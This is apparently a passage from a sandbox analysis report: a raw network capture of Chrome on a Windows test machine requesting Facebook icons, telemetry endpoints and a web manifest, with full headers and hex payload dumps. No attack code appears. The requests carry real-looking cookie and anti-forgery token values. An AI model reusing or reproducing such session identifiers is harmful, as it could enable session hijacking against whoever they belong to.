                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC608OUTGET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1879INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: image/x-icon
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: jN3KQn2um5Jec0MvhzPgWg==
                                                                                                                                                                                                                                  Expires: Sat, 20 Sep 2025 06:19:18 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: PB+40ulrgnHScHwc2k2zv3Clm51XkEQroq/08d7ssXVv22C6wP+3tYyXJF5qaEeylRabqrhcplKGJDxjspFXdA==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:24 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 4286
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1INData Raw: 00
                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC4285INData Raw: 00 01 00 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 10 00 00 c2 1e 00 00 c2 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 80 00 06 e2 65 04 47 e0 63 00 95 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e0 64 00 bf e0 63 00 95 e2 65 00 47 ff 80 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ea 6a 0b 18 e2 66 02 96 e1 66 01 f1 e2 66 01 ff e1 65 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                  Data Ascii: ( @ eGcdceGjfffe


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  88192.168.2.649815157.240.252.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC841OUTPOST /shared/user_preferences/ HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 3710
                                                                                                                                                                                                                                  X-FB-LSD: AVrc04HtcqM
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                  X-ASBD-ID: 129477
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; _js_datr=O934ZvtQ_C-R3ZM0Ae39F-hF; wd=1280x907
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC3710OUTData Raw: 64 61 74 61 3d 65 79 4a 6c 64 6d 56 75 64 43 49 36 49 6d 78 76 5a 32 64 6c 5a 46 39 76 64 58 52 66 63 32 4e 68 62 6c 39 79 5a 58 4e 31 62 48 51 69 4c 43 4a 73 62 32 4e 68 62 46 39 7a 64 47 39 79 59 57 64 6c 49 6a 70 62 49 6c 4e 6c 63 33 4e 70 62 32 34 69 4c 43 4a 6f 59 6c 39 30 61 57 31 6c 63 33 52 68 62 58 41 69 4c 43 4a 7a 61 57 64 75 59 57 78 66 5a 6d 78 31 63 32 68 66 64 47 6c 74 5a 58 4e 30 59 57 31 77 49 6c 30 73 49 6e 4a 6c 63 33 56 73 64 48 4d 69 4f 6c 74 62 49 6e 4e 6a 63 6d 6c 77 64 43 49 73 49 6d 68 30 64 48 42 7a 4f 69 38 76 63 33 52 68 64 47 6c 6a 4c 6e 68 34 4c 6d 5a 69 59 32 52 75 4c 6d 35 6c 64 43 39 79 63 33 4a 6a 4c 6e 42 6f 63 43 39 32 4d 79 39 35 4d 53 39 79 4c 33 4d 78 62 30 5a 57 55 33 64 76 5a 6e 4d 31 4c 6d 70 7a 49 69 78 75 64 57
                                                                                                                                                                                                                                  Data Ascii: data=eyJldmVudCI6ImxvZ2dlZF9vdXRfc2Nhbl9yZXN1bHQiLCJsb2NhbF9zdG9yYWdlIjpbIlNlc3Npb24iLCJoYl90aW1lc3RhbXAiLCJzaWduYWxfZmx1c2hfdGltZXN0YW1wIl0sInJlc3VsdHMiOltbInNjcmlwdCIsImh0dHBzOi8vc3RhdGljLnh4LmZiY2RuLm5ldC9yc3JjLnBocC92My95MS9yL3Mxb0ZWU3dvZnM1LmpzIixudW
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1900INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Set-Cookie: _js_datr=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=-1727585603; path=/; domain=.facebook.com; httponly
                                                                                                                                                                                                                                  Set-Cookie: datr=O934ZvtQ_C-R3ZM0Ae39F-hF; expires=Mon, 03-Nov-2025 04:53:24 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923671617348965", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(self), clipboard-write=(self), compute-pressure=(), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(self), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), private-state-token-issuance=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  cross-origin-opener-policy: same-origin-allow-popups
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                  Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1124INData Raw: 72 65 70 6f 72 74 2d 74 6f 3a 20 7b 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 62 72 6f 77 73 65 72 5f 72 65 70 6f 72 74 69 6e 67 5c 2f 63 6f 6f 70 5c 2f 3f 6d 69 6e 69 6d 69 7a 65 3d 30 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 6f 6f 70 5f 72 65 70 6f 72 74 22 2c 22 69 6e 63 6c 75 64 65 5f 73 75 62 64 6f 6d 61 69 6e 73 22 3a 74 72 75 65 7d 2c 20 7b 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 61 6a 61 78 5c 2f 62 72 6f 77 73 65 72 5f 65 72 72 6f 72
                                                                                                                                                                                                                                  Data Ascii: report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC68INData Raw: 33 65 0d 0a 66 6f 72 20 28 3b 3b 29 3b 7b 22 5f 5f 61 72 22 3a 31 2c 22 70 61 79 6c 6f 61 64 22 3a 6e 75 6c 6c 2c 22 6c 69 64 22 3a 22 37 34 31 39 39 32 33 36 37 31 36 31 37 33 34 38 39 36 35 22 7d 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 3efor (;;);{"__ar":1,"payload":null,"lid":"7419923671617348965"}
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  89192.168.2.649814157.240.252.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1201OUTPOST /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=3&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqM HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 5015
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQiP8gUtKF2om5oZA
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; _js_datr=O934ZvtQ_C-R3ZM0Ae39F-hF; wd=1280x907
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC5015OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 51 69 50 38 67 55 74 4b 46 32 6f 6d 35 6f 5a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 73 22 0d 0a 0d 0a 31 37 32 37 35 38 35 36 30 33 31 38 38 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 51 69 50 38 67 55 74 4b 46 32 6f 6d 35 6f 5a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 71 22 0d 0a 0d 0a 5b 7b 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 70 6f 73 74 73 22 3a 22 6a 69 58 77 61 56 74 62 49 6d 5a 68 62 47 4e 76 4f 6d 4a 79 62 33 64 7a 5a 58 4a 66 63 47 56 79
                                                                                                                                                                                                                                  Data Ascii: ------WebKitFormBoundaryQiP8gUtKF2om5oZAContent-Disposition: form-data; name="ts"1727585603188------WebKitFormBoundaryQiP8gUtKF2om5oZAContent-Disposition: form-data; name="q"[{"app_id":"256281040558","posts":"jiXwaVtbImZhbGNvOmJyb3dzZXJfcGVy
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC952INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923671823967326", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923671823967326"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC2004INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                  Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  90192.168.2.649817157.240.252.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC686OUTGET /data/manifest/ HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: manifest
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; _js_datr=O934ZvtQ_C-R3ZM0Ae39F-hF; wd=1280x907
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1095INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Set-Cookie: _js_datr=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=-1727585603; path=/; domain=.facebook.com; httponly
                                                                                                                                                                                                                                  Set-Cookie: datr=O934ZvtQ_C-R3ZM0Ae39F-hF; expires=Mon, 03-Nov-2025 04:53:24 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923670255387416", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923670255387416"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1673INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                  Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC5INData Raw: 34 61 66 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 4af
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1206INData Raw: 7b 22 67 63 6d 5f 73 65 6e 64 65 72 5f 69 64 22 3a 22 31 35 30 35 37 38 31 34 33 35 34 22 2c 22 67 63 6d 5f 75 73 65 72 5f 76 69 73 69 62 6c 65 5f 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 65 64 67 65 5f 73 69 64 65 5f 70 61 6e 65 6c 22 3a 7b 22 70 72 65 66 65 72 72 65 64 5f 77 69 64 74 68 22 3a 33 37 36 7d 2c 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 22 2c 22 6e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 22 2c 22 73 74 61 72 74 5f 75 72 6c 22 3a 22 5c 2f 3f 72 65 66 3d 68 6f 6d 65 73 63 72 65 65 6e 70 77 61 22 2c 22 64 69 73 70 6c 61 79 22 3a 22 6d 69 6e 69 6d 61 6c 2d 75 69 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 22 3a 22 23 46 46 46 46 46 46 22 2c 22 74 68 65 6d 65 5f 63 6f 6c 6f 72 22 3a 22 23 31 38 37 37 46 32 22 2c
                                                                                                                                                                                                                                  Data Ascii: {"gcm_sender_id":"15057814354","gcm_user_visible_only":true,"edge_side_panel":{"preferred_width":376},"short_name":"Facebook","name":"Facebook","start_url":"\/?ref=homescreenpwa","display":"minimal-ui","background_color":"#FFFFFF","theme_color":"#1877F2",


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  91192.168.2.649818157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC372OUTGET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
